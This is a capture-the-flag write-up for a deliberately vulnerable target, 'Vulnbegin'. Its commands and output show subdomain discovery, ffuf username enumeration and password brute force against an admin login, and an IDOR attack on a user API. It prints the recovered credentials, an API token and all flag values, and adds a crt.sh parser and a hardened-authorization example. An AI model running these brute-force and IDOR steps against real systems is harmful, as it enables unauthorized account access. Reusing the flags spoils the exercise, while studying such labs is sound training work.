Vulnbegin

Subdomain Discovery

DNS Infos

nslookup -type=any vulnbegin.co.uk 8.8.8.8

Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnbegin.co.uk
Address: 68.183.255.206
vulnbegin.co.uk	nameserver = ns1.digitalocean.com.
vulnbegin.co.uk	nameserver = ns2.digitalocean.com.
vulnbegin.co.uk	nameserver = ns3.digitalocean.com.
vulnbegin.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnbegin.co.uk
	serial = 1626211765
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800
vulnbegin.co.uk	text = "[^FLAG^BED649C4DB2DF265BD29419C13D82117^FLAG^]"

Authoritative answers can be found from

DNS Bruteforce

dnsrecon -d vulnbegin.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt

[*] Performing host and subdomain brute force against vulnbegin.co.uk
[*] 	 A server.vulnbegin.co.uk 68.183.255.206
[*] 	 A www.vulnbegin.co.uk 68.183.255.206
[+] 2 Records Found
curl -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk

{"error":"User Not Authenticated","flag":"[^FLAG^E858ED9649E57BECE9ACD1A4C60D3446^FLAG^]"}

SSL Certificate Records

A great resource for these SSL records is crt.sh. If you visit https://crt.sh/?q=vulnbegin.co.uk you will see the certificates that have been issued for vulnbegin.co.uk and the names they cover:

Common Name                 Matching Identities
v64hss83.vulnbegin.co.uk    v64hss83.vulnbegin.co.uk
vulnbegin.co.uk             *.vulnbegin.co.uk / vulnbegin.co.uk
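Reading the crt.sh table by hand works for one domain, but the same lookup can be scripted against crt.sh's JSON output. The following is an added example, not code from the original writeup: it assumes the query form https://crt.sh/?q=%25.vulnbegin.co.uk&output=json and parses a constructed sample of that response to build a de-duplicated list of in-scope hostnames, with wildcard entries reported separately.

```python
import json
import re

# Constructed sample of a crt.sh JSON response (https://crt.sh/?q=%25.vulnbegin.co.uk&output=json).
# Not real data: only the fields a subdomain inventory needs are filled in.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "v64hss83.vulnbegin.co.uk",
     "name_value": "v64hss83.vulnbegin.co.uk", "not_before": "2021-07-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "vulnbegin.co.uk",
     "name_value": "*.vulnbegin.co.uk\nvulnbegin.co.uk", "not_before": "2021-06-15T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "WWW.Vulnbegin.co.uk",
     "name_value": "www.vulnbegin.co.uk", "not_before": "2021-05-01T00:00:00"},
])

# Plain DNS hostname: labels of letters/digits/hyphens, at least two labels.
HOSTNAME_RE = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)+$")


def extract_names(crtsh_json, apex):
    """Return (hostnames, wildcards): sorted, unique, lowercased names under `apex`.

    Each crt.sh entry lists every SAN in `name_value`, one per line, and the
    certificate's CN in `common_name`; both are collected.  Wildcards are kept
    apart because they are not resolvable hosts, but they do show that a cert
    valid for any label under the apex exists.
    """
    apex = apex.lower()
    hosts, wildcards = set(), set()
    for entry in json.loads(crtsh_json):
        candidates = entry.get("name_value", "").split("\n") + [entry.get("common_name", "")]
        for raw in candidates:
            name = raw.strip().lower()
            if not name or not (name == apex or name.endswith("." + apex)):
                continue  # empty line or a name outside the scope
            if name.startswith("*."):
                wildcards.add(name)
            elif HOSTNAME_RE.match(name):
                hosts.add(name)
    return sorted(hosts), sorted(wildcards)


if __name__ == "__main__":
    hosts, wildcards = extract_names(SAMPLE_CRTSH_JSON, "vulnbegin.co.uk")
    print("hosts:", hosts)
    print("wildcards:", wildcards)
```

Every name it returns still needs resolving (a certificate proves the name was requested once, not that a host answers today), which is exactly why the writeup follows up with curl against each one.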

Checking Domain v64hss83.vulnbegin.co.uk

curl -H "Cookie: ctfchallenge=CENSORED" http://v64hss83.vulnbegin.co.uk

[^FLAG^047524FE61AE6B5FD1D184994C7322FC^FLAG^]

Content Discovery

ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/FUZZ -mc all -fc 404
=> Results <=
cpadmin
css
js
robots.txt
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/robots.txt
User-agent: *
Disallow: /secret_d1rect0y/
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/secret_d1rect0y
[^FLAG^2B22E2CB70E218510802B0359488F6A2^FLAG^]

Brute Force

Checking for Valid Users

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Username is invalid'
admin                   [Status: 200, Size: 1483, Words: 422, Lines: 37]

Bruteforcing Password

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "username=admin&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Password is invalid'
159753                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 31ms]

Flag

Log in to http://www.vulnbegin.co.uk/cpadmin with the credentials admin:159753. Flag: [^FLAG^93D7491FB4B054FB5C5AC3E0292BE41C^FLAG^]

Content Discovery #2

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
env                     [Status: 200, Size: 111, Words: 2, Lines: 1]

Visiting http://www.vulnbegin.co.uk/cpadmin/env we find the flag and a probably interesting X-Token header for the API:
{"api_key":"X-Token: 492E64385D3779BC5F040E2B19D67742","flag":"[^FLAG^F6A691584431F9F2C29A3A2DE85A2210^FLAG^]"}

API Recon

Check the API

curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk
{"messaged":"User Authenticated","flag":"[^FLAG^0BDC60CC5E283476E7107C814C18DCCF^FLAG^]"}

Search for API Endpoints

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/FUZZ -mc all -fc 404
user                    [Status: 200, Size: 89, Words: 1, Lines: 1]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user
{"id":27,"endpoint":"\/user\/27"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27
{"id":27,"username":"vulnbegin_website","endpoint":"\/user\/27\/info"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27/info
{"id":27,"username":"vulnbegin_website","description":"User for the main website","flag":"[^FLAG^7B3A24F3368E71842ED7053CF1E51BB0^FLAG^]"}

Check for IDOR

seq 1 100 | ./ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404
5                       [Status: 403, Size: 48, Words: 9, Lines: 1, Duration: 32ms]
27                      [Status: 200, Size: 70, Words: 1, Lines: 1, Duration: 31ms]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5
["You do not have permission to view this user"]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5/info
{"id":5,"username":"admin","description":"admin for the server","flag":"[^FLAG^3D82BE780F46EE86CE060D23E6E80639^FLAG^]"}
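The two responses above show the classic IDOR shape: /user/5 is denied, but the nested /user/5/info is not, so the ownership check was written into one handler and missed in the other. This added example (not the challenge's own code) models that bug and its fix in Python with constructed data: the vulnerable pair of handlers next to a hardened version that routes every /user/<id>... request through a single authorization gate. The token-to-user mapping and the user table are assumptions.

```python
# Constructed in-memory user table standing in for the API's backing store (not the real
# service's data); the id/username pairs mirror the two users visible in the writeup.
USERS = {
    27: {"username": "vulnbegin_website", "description": "User for the main website"},
    5:  {"username": "admin", "description": "admin for the server"},
}
# Assumed token-to-user mapping: the website's API key resolves to user 27.
TOKENS = {"492E64385D3779BC5F040E2B19D67742": 27}


def _caller(token):
    """User id behind an X-Token value, or None if the token is unknown."""
    return TOKENS.get(token)


# --- vulnerable version: the ownership check lives in one handler only ---
def vulnerable_user(token, uid):
    if _caller(token) != uid:
        return 403, ["You do not have permission to view this user"]
    return 200, {"id": uid, "endpoint": f"/user/{uid}/info"}


def vulnerable_user_info(token, uid):
    # The nested route only checks that the token is valid and the id exists,
    # never that the caller owns it: any authenticated client can read any id.
    if uid not in USERS or _caller(token) is None:
        return 404, None
    return 200, {"id": uid, **USERS[uid]}


# --- hardened version: one gate, applied before every /user/<id>... handler ---
def authorize(token, uid):
    """Return (status, body) when access is denied, or None when it is allowed."""
    caller = _caller(token)
    if caller is None:
        return 401, {"error": "User Not Authenticated"}
    if caller != uid:
        # Ownership is checked before existence so a foreign id gets the same
        # answer whether or not it exists; no enumeration oracle.
        return 403, ["You do not have permission to view this user"]
    if uid not in USERS:
        return 404, {"error": "not found"}
    return None


def hardened_user_info(token, uid):
    denied = authorize(token, uid)
    if denied:
        return denied
    return 200, {"id": uid, **USERS[uid]}
```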
